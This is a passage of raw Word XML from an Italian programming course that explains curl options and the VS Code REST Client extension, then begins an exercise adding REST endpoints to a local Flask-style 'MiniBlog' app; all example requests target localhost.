        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId40">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/api/messaggi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Vedere il dettaglio completo della richiesta e risposta</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId40">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/api/messaggi</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Decifrazione degli switch:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1076"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-X METODO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ specifica il metodo HTTP (default: GET)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1076"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-H "Header: valore"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ aggiunge un header alla richiesta</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1076"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-d "dati"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ invia dati nel body (implica</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-X POST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">se non specificato altrimenti)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1076"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ mostra anche gli header della risposta</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1076"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-v</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ modalità</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">verbose</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: mostra tutta la conversazione richiesta/risposta</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="167"/>
    <w:bookmarkStart w:id="168" w:name="Xa21793fbc9e8e8771eefbbee6c80986747cdba1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Strumento 2: REST Client (estensione di VS Code)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quando le richieste sono molte e vuoi tenerne traccia, scrivere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ogni volta è scomodo.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">REST Client</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è un’estensione di VS Code che permette di scrivere richieste HTTP in un file di testo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.http</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e lanciarle con un click.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Installazione:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1077"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apri VS Code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1077"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vai su Extensions (icona dei quadratini, </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec_0_4" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">sezione 0.4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> del </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_0" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 0</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1077"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cerca</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">REST Client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(autore:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Huachao Mao</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1077"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Installa. Nessuna configurazione aggiuntiva.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Uso:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Crea un nuovo file con estensione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.http</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.rest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ad esempio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">test-api.http</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">### Recupera tutti i messaggi</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET </w:t>
      </w:r>
      <w:hyperlink r:id="rId40">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/api/messaggi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">### Login (riceve un token)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">POST </w:t>
      </w:r>
      <w:hyperlink r:id="rId41">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/api/login</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type: application/json</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  "username": "mario",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  "password": "mario"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">### Pubblica un messaggio (con token)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">POST </w:t>
      </w:r>
      <w:hyperlink r:id="rId40">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/api/messaggi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type: application/json</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorization: Bearer IL-TOKEN-RICEVUTO</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  "testo": "Ciao dal REST Client!"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sopra ogni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">###</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(separatore di richieste) compare un piccolo testo cliccabile:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Send Request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Cliccalo: si apre un pannello a destra con la risposta completa. Ogni richiesta è isolata e riproducibile.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">📷</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">VS Code aperto su un file .http, con il link</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Send Request</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">visibile sopra una richiesta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5669280" cy="3239589"/>
            <wp:docPr id="12" name="Picture 12"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="screenshot_12_VS_Code_aperto_su_un_file_http_con_il_link_Send_Request_visi.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="3239589"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Vantaggi rispetto a curl:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1078"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sintassi pulita, facile da rileggere</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1078"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.http</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">può essere salvato nel progetto e versionato con Git: chi clona il progetto trova tutte le richieste di test pronte all’uso</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1078"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Visualizzazione formattata della risposta JSON</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1078"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nessuna installazione esterna, nessun account</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">💡</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Postman e Insomnia.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Nel mondo professionale incontrerai sicuramente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Postman</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(il più diffuso) e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Insomnia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Sono applicazioni desktop con interfaccia grafica completa, collezioni condivise, ambienti di test, generazione automatica di codice client. Sono ottimi strumenti professionali, ma per il primo anno introducono complessità non necessaria (account online, sincronizzazione cloud, interfaccia che nasconde la richiesta HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vera</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Quando avrai consolidato i fondamentali con curl e REST Client, passare a Postman sarà istantaneo: i concetti sono identici, cambia solo l’interfaccia.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="168"/>
    <w:bookmarkEnd w:id="169"/>
    <w:bookmarkStart w:id="174" w:name="X9c679cdeb4ba0da1efabba77cf902c2a63c733a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3b.11 Esercitazione: aggiungiamo API REST a MiniBlog</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Riprendiamo l’app</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">MiniBlog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">del </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_3" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> e le aggiungiamo un’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">interfaccia API REST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">parallela a quella HTML. Le pagine HTML continueranno a funzionare per il browser; le API REST risponderanno a client esterni (curl, REST Client, in futuro un’app mobile o un frontend JavaScript).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="170" w:name="step-1-riapri-miniblog"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 1 — Riapri MiniBlog</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1079"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In VS Code, apri la cartella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">corso-sicurezza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1079"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apri il terminale, attiva l’ambiente virtuale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1079"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Entra nella cartella di MiniBlog:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cd miniblog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1079"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apri il file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">miniblog.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(quello che hai scritto nell’esercitazione 3.14).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="170"/>
    <w:bookmarkStart w:id="171" w:name="step-2-aggiungiamo-gli-endpoint-api"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 2 — Aggiungiamo gli endpoint API</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apri</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">miniblog.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">aggiungi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in fondo al file (prima di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">if __name__ == "__main__":</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) le funzioni qui sotto. Importa anche la funzione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
